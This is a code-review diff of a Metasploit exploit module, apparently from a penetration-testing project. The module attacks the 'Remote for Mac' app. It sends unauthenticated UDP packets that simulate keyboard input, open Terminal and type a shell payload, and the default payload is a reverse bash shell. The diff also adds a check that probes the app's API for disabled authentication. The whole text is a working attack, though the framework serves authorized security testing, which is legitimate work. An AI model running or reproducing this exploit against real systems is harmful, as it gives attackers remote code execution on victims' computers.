Code rebase, fixing according to the comments

Author: msutovsky-r7

modules/exploits/osx/misc/remote_for_mac_udp_rce.rb

@@ -5,6 +5,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Udp
 
   def initialize(info = {})
     super(
@@ -16,79 +17,54 @@ def initialize(info = {})
           When the "Allow unknown devices" setting is enabled, it is possible to simulate keyboard input via UDP packets
           without authentication. By sending a sequence of key presses, an attacker can open the Terminal and execute
           arbitrary shell commands, achieving code execution as the current user.
-
-          Tested on macOS Mojave and Ventura.
         },
         'Author' => ['Chokri Hammedi'],
         'License' => MSF_LICENSE,
         'References' => [
           ['URL', 'https://packetstorm.news/files/id/196351/']
         ],
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [
+            'Unix Shell', {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'DefaultPayload' => 'cmd/unix/reverse_bash',
+        'DisclosureDate' => '2025-05-27',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
-        },
-        'Platform' => ['unix','osx'],
-        'Arch' => ARCH_CMD,
-        'Targets' => [['Remote for Mac 2025.6', {}]],
-        'DefaultTarget' => 0,
-        'DefaultPayload' => 'cmd/unix/reverse_bash',
-        'DisclosureDate' => '2025-05-27'
+        }
       )
     )
-
-    register_options(
-      [
-        Opt::RHOSTS(),
-        Opt::RPORT(49229),
-        OptBool.new('SSL', [true, 'Use SSL for HTTP check', true]),
-        OptString.new('TARGETURI', [true, 'Base URI path', '/']),
-      ]
-    )
   end
 
-  def check_auth_disabled?
-    protocol = datastore['SSL'] ? 'https' : 'http'
-    vprint_status("Checking authentication on #{protocol}://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}api/getVersion")
-
-    begin
-      res = send_request_cgi({
-        'method' => 'GET',
-        'uri' => normalize_uri(datastore['TARGETURI'], 'api', 'getVersion'),
-        'ctype' => 'application/json',
-        'ssl' => datastore['SSL'],
-        'rport' => datastore['RPORT'],
-        'rhost' => datastore['RHOSTS']
-      })
-
-      if res&.code == 200
-        json = JSON.parse(res.body)
-        if json['requires.auth'] == false
-          print_good('Authentication is disabled. Target is vulnerable.')
-          return true
-        else
-          print_error('Authentication is enabled. Exploit aborted.')
-          return false
-        end
-      else
-        print_error('Unexpected response from target')
-        return false
-      end
-    rescue ::Rex::ConnectionError, JSON::ParserError => e
-      print_error("Connection or parsing error: #{e.message}")
-      return false
-    end
-  end
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'getVersion')
+    })
 
-  def exploit
-    unless check_auth_disabled?
-      fail_with(Failure::NotVulnerable, 'Target requires authentication or is unreachable')
-    end
+    return CheckCode::Safe('Application might not be Remote For Mac') unless res&.code == 200
+
+    json_body = res.get_json_document
+    auth_enabled = json_body.fetch('requires.auth', nil)
 
-    udp_port = datastore['RPORT']
-    target_ip = datastore['RHOSTS']
+    return CheckCode::Appears('Authentication is disabled, target is vulnerable') if auth_enabled == 'false'
 
+    CheckCode::Detected('Remote For Mac detected, but authentication enabled')
+  end
+
+  def exploit
     initial_packets_hex = [
       '07000200370001',
       '07000200370001',
@@ -102,45 +78,43 @@ def exploit
       '07000200240000'
     ]
 
-    udp_sock = UDPSocket.new
-    udp_sock.connect(target_ip, udp_port)
+    udp_sock = connect_udp
 
     print_status('Simulating system keyboard input to open Terminal...')
     initial_packets_hex.each do |hexpkt|
-      udp_sock.send([hexpkt].pack('H*'), 0)
+      udp_sock.put([hexpkt].pack('H*'))
       select(nil, nil, nil, 0.05)
     end
 
     prefix = [0x06, 0x00, 0x03, 0x00].pack('C*')
     'terminal'.each_char do |ch|
       pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')
-      udp_sock.send(pkt, 0)
+      udp_sock.put(pkt)
       select(nil, nil, nil, 0.1)
     end
 
     final_packets_hex.each do |hexpkt|
-      udp_sock.send([hexpkt].pack('H*'), 0)
-      select(nil, nil, nil, 0.1)
+      udp_sock.put([hexpkt].pack('H*'))
     end
 
+    print_status('Initial sequence finished, waiting for terminal to be spawned..')
+
     sleep(2)
 
     shell_cmd = payload.encoded
     print_status('Sending malicious payload to be executed...')
 
     shell_cmd.each_char do |ch|
       pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')
-      udp_sock.send(pkt, 0)
+      udp_sock.put(pkt)
       select(nil, nil, nil, 0.1)
     end
 
     final_packets_hex.each do |hexpkt|
-      udp_sock.send([hexpkt].pack('H*'), 0)
-      select(nil, nil, nil, 0.1)
+      udp_sock.put([hexpkt].pack('H*'))
     end
 
     print_good('Payload sent. Awaiting session...')
-  ensure
-    udp_sock.close if udp_sock
+    disconnect_udp(udp_sock)
   end
 end